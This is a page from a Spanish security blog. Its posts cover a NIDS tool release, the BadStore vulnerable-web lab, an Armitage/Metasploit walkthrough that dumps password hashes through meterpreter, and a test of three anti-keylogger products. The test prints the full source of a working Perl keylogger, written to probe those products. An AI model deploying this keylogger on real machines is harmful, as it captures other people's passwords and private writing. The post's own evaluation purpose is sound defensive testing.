    > on, or now you prefer worrying about other things?


    I am not paranoid at all, and I prefer not to worry (although I
    certainly sometimes do).  I do not believe in computer security with
    current hardware.  There are just too many components that are
    vulnerable, and I have no trust in the semiconductor and software
    industry in general.  I have seen government agencies plant backdoors
    in operating systems in the early 1990ies, and I have no reason to
    believe that such practices have stopped.


    Computer security has a hard sell on me.
    ----------------------------------------------------------------------------------------------------------
    Leer más...

    17 febrero 2011

    Vídeo Tutoriales de Patriot NG

    Poco tiempo ha pasado desde que lanzábamos la versión 2.0 de Patriot NG y ya van casi 1.000 downloads !

    Aprovecho también para comentar que ya hay una versión del instalador para 64bits por lo que queda cubierta toda la gama Windows (XP, Vista32, Vista64, 7-32,7-64)

    Una de las novedades mas destacadas de esta versión es el módulo NIDS que permite analizar el tráfico de red e interceptar amenazas 'al vuelo'.

    La idea original es dar las máximas facilidades a la hora de crear reglas por parte de los usuarios (y que nos las hagáis llegar, así salimos beneficiados todos)

    Por si quedó alguna duda sobre como hacerlas (ver el post del lanzamiento), Luis Delgado se ha currado un estupendo vídeo-tutorial donde explica gráficamente el proceso:


    Y el resultado lo podemos ver aquí:


    Si te animas a contribuir y crear reglas puedes unirte a la lista de correo de contribuciones aquí
    Leer más...

    16 febrero 2011

    Aprendiendo hacking web con BadStore

    Cuando se trata de aprender las diferentes técnicas de ataques web, tenemos dos opciones:

    1.-) Sentarnos delante del PC y arrearle a la página web de Nintendo pruebayveras.com, para una vez encontrados los fallos, arriesgarnos a que al notificarlo con pruebas suficientes, contraataquen y nos metan entre rejas.
    2.-) Juguetear en un entorno controlado y cerrado sobre una aplicación web repleta de vulnerabilidades a la que, si logramos entrar hasta la cocina, no tendrá repercusiones legales.
    Así pues, como no tenemos intención de perder lectores por no tener acceso a Internet desde la cárcel (culpa de una noche entretenida), hoy os recomendamos uno de los entornos del segundo tipo, probablemente el más fácil y rápido de desplegar: badstore.net.

    Tiempo atrás propusimos una lista recopilación de aplicaciones web vulnerables en la que aparecía nombrada la que nos referimos ahora.      

    La principal ventaja de Badstore es que es un ISO (de sólo 10 MB!) que arranca una distribución Linux (en concreto Trinux) en modo Live (ya sea en un equipo completo o en una máquina virtual), por lo que no pasará nada después de todas las perrerías que le hagamos durante una sesión. Con un nuevo reinicio volveremos a tener un entorno recién instalado para comenzar. Además los requisitos hardware necesarios son mínimos (Pentium 200MMX, 64 MB RAM), no consumiendo apenas recursos del PC cuando se ejecuta en una máquina virtual (probado en VMware y en Parallels sobre Mac OS X), haciéndola ideal para demos y mucho más recomendable que entornos más pesados como los clásicos Hacme (Bank, Books, Casino, Travel...) de Foundstone/Mcafee, que requieren un sistema operativo Windows con MSDE/SQL Server, IIS, etc,… o WebGoat de OWASP que requiere disponer de un Tomcat. Cierto es que estos otros entornos son mucho más completos y complejos que Badstore y pueden ser utilizados para fases posteriores o en instalaciones en máquinas independientes.

    Badstore presenta la típica aplicación web de una tienda online, con un portal de compra de artículos en la que podemos encontrar vulnerabilidades, entre otras, como las siguientes:

      No he encontrado manuales, ni guías de todos los fallos documentados sobre Badstore. De hecho, el autor, en la documentación que acompaña el proyecto, Kurt R. Roemer, no desvela paso a paso los detalles de cómo explotar cada vulnerabilidad, aunque más o menos menciona unas cuantas pistas por las que deberíamos mirar.

      Sin embargo, si que he dado con un par de documentos que guían inicialmente cómo afrontar la aplicación, un punto de partida y una metodología a seguir [1] y [2].

      Conclusiones:

      Recomiendo badstore.net ante otras plataformas vulnerables que he probado, por varios motivos.
      1. El más importante es la sencillez y velocidad de tener un entorno funcional. Sólo con inicializar la red con una IP "alcanzable" desde la máquina local es suficiente.
      2. Los pocos recursos necesarios: Arranca en una máquina virtual sin disco duro, son 10 MB de ISO y no se nota que tienes otra máquina virtual más. De hecho podríamos destacar la portabilidad como otra de las ventajas, pudiendo llevar la máquina virtual y el ISO en casi cualquier pendrive USB.
      3. Tiene ejemplos de casi todas las vulnerabilidades web más comunes. Para mi trabajo, que consiste en proteger esos fallos de seguridad haciendo las peticiones web a través de un WAF, es más que suficiente para abrir mentes y en algunos casos… bocas que decían que sus webs eran seguras!
      Leer más...

      15 febrero 2011

      Armitage, GUI para Cyber Attack Management con Metasploit

      Armitage es una joven interfaz gráfica no comercial y open source destinada a interaccionar con Metasploit Framework en el proceso de pentesting. Tenemos algunos recursos parecidos como la propia msfgui (incluida con MSF) o la comercial Metasploit Express de la que hablamos la semana pasada.

      MSF no es una herramienta especialmente difícil de utilizar, pero bien es cierto que cuenta con muchas opciones diferentes y puede llevar tiempo aprender a utilizarlo con soltura.

      Para poder empezar a trabajar con ella necesitaremos preparar nuestro equipo, una vez hecho y funcionando, la iniciamos y encontramos lo siguiente:


      Si ya hemos usado MSF antes, los menús nos resultarán muy intuitivos, vamos a ver como lanzamos un exploit e interaccionamos con meterpreter. Lo primero que debemos hacer es configurar un listener con meterpreter:


      Ahora vamos al menú Attacks y seleccionamos el ataque que deseamos utilizar:


      Configuramos el módulo antes de lanzarlo:


      Una vez que el exploit ha hecho efecto aparecerá el host en la sección de hosts. Dado que hemos utilizado meterpreter como payload podemos interaccionar con él mediante la interfaz de una forma muy cómoda e intuitiva. Por ejemplo, podemos extraer los hashes de las cuentas de usuario:


      También podemos hacer una captura de pantalla, la cual nos aparecerá en una pestaña nueva de la sección inferior:


      Además, la interfaz gráfica nos ayuda a organizar a modo de esquema los hosts con los que estamos trabajando, pudiendo tratar cada uno por separado para hacer escaneos de puertos, lanzar módulos, etc.


      Según el autor de la interfaz, su motivación para crearla fue que conoce muchos expertos en seguridad que no saben utilizar MSF y Armitage podría ayudar a introducirles en el proceso de pentest.

      Por un lado es muy cierto que hace MSF usable para cualquiera que no sepa utilizarlo, pero por otro lado los usuarios que tengan soltura con el framework lo aprovechan mucho más, además de que la interfaz es mucho más intuitiva si sabemos cómo funciona MSF.

      Hay aspectos que resultan muy positivos, por ejemplo la interacción con un host mediante meterpreter, donde acciones como la gestión de ficheros se hacen mucho más usables y llevaderas cuando se utiliza la interfaz. También es de mucha ayuda cuando se está trabajando con varios hosts a la vez (más si uno o varios están haciendo de pivot), ya que permite organizarlos de forma muy eficiente.

      Más información y recursos en la web oficial:
      - Armitage Media
      - Armitage Manual
      Leer más...

      14 febrero 2011

      Anti-Keyloggers a examen

      Uno de los riesgos mas preocupantes que nos podemos encontrar cuando usamos un PC es que todas las pulsaciones realizadas sobre él sean interceptadas y grabadas. 

      Los famosos 'Keyloggers' resultan muy útiles para robar principalmente contraseñas, aunque también supone un riesgo contra nuestra privacidad si todos los correos escritos / conversaciones de chat etc son interceptados.

      Existen un buen numero de programas 'Anti keyloggers', de todos ellos he seleccionado 3


      Todos ellos prometen lo mismo: son capaces de detectar y bloquear cualquier tipo de keylogger conocido o desconocido, es decir, no actúan con listas negras / blancas, analizan comportamiento.

      Para ponerlos a prueba he preferido no usar algún keylogger conocido y famoso por aquello del ¿será verdad que no usan firmas?.  Así que me he hecho mi propio keylogger.

      Mi Keylogger es extremadamente simple y sencillo, haciendo uso de GetAsyncKeyState, una llamada disponible en el API de Windows, he construido un simple pero efectivo keylogger en Perl.

      El keylogger registra cualquier pulsación del teclado y permite escribir lo capturado o bien por pantalla, o en un fichero especificado como primer argumento.

      use Win32::API;
      use Time::HiRes qw(usleep);
      use strict ;
      
      $|=1;
      
      $SIG{'INT'} = \&muere;
      $SIG{'QUIT'} = \&muere;
      $SIG{'KILL'} = \&muere;
      $SIG{'ABRT'} = \&muere;
      $SIG{'STOP'} = \&muere;
      
      sub muere
      
      {
          close FH ;
          exit 0;
      }
      
      my $rsGetAsyncKeyState = new Win32::API("user32", "GetAsyncKeyState", "N", "I"); 
      my $ret; 
      my $keyCode;
      
       
      while(1) {     
          if (@ARGV[0]) {
      
              open (FH, ">>", "@ARGV[0]") ;
      
          }
      
          for ($keyCode=0; $keyCode<256; $keyCode++) {
      
              $ret = $rsGetAsyncKeyState->Call($keyCode);
      
              if ($ret eq -32767) { 
      
                  my $tecla= chr($keyCode);
      
                  if (@ARGV[0]) {
      
                      if ($keyCode == "13") { print FH "\n" }
                      print FH "$tecla"
      
                  }
      
                  else {
      
                      if ($keyCode == "13") { print "\n" }
                      print "$tecla"
      
                  }
              }   
          }
          usleep(1000);
      }

      Se puede descargar ya convertido en .exe aquí

      Zemana AntiLogger

      Una vez completado el proceso de instalación (siguiente siguiente fin) procedemos a ejecutar keylog.exe desde un cmd.exe y automáticamente aparece una notificación en el tray:


      Perfecto ! lo ha pillado a la primera, ha identificado que es un keylogger y lo ha bloqueado. Al intentar volver a ejecutar el proceso keylog.exe, directamente no se ejecuta, si copiamos el .exe con otro nombre, da igual, está bloqueado.

      DataGuard AntiKeylogger

      Una vez hecha la instalación nos pide que re-iniciemos el sistema, terminado ese paso ya está activo.

      Repetimos la prueba, ejecutamos keylog.exe y ¡sorpresa! no tenemos ningún evento que notifique que hay un keylogger en uso, no obstante, el keylogger no funciona. Asumo que DataGuard bloquea ciertas llamadas al sistema como método de protección. Bien por bloquear el keylogger, mal por no haberlo detectado. 

      Si vamos a los logs del programa:


      Vemos que si ha detectado y bloqueado parte del software de VMware, siendo este claramente un falso positivo.

      PrivacyKeyboard

      Vamos con la tercera prueba, una vez instalamos PrivacyKeyboard, lanzamos nuestro -a estas alturas- ya querido keylog.exe y ¡vaya! ni un solo evento / notificación, no obstante y repitiendo el mismo patrón que con DataGuard, el keylog tampoco es efectivo, no recoge datos.

      Si observamos el visor de logs del programa:


      Se repite el mismo falso positivo con VMware que daba DataGuard.

      Conclusión

      Todas las soluciones analizadas han sido capaces de bloquear el uso de nuestro simple keylogger volviéndolo inefectivo. Pero solo una, Zemana, es capaz de identificar el keylogger y avisarnos de que está siendo utilizado en el sistema. El resto, no solo no nos han notificado, sino que además han cometido falsos positivos
      Leer más...

      13 febrero 2011

      Enlaces de la SECmana - 58


      Leer más...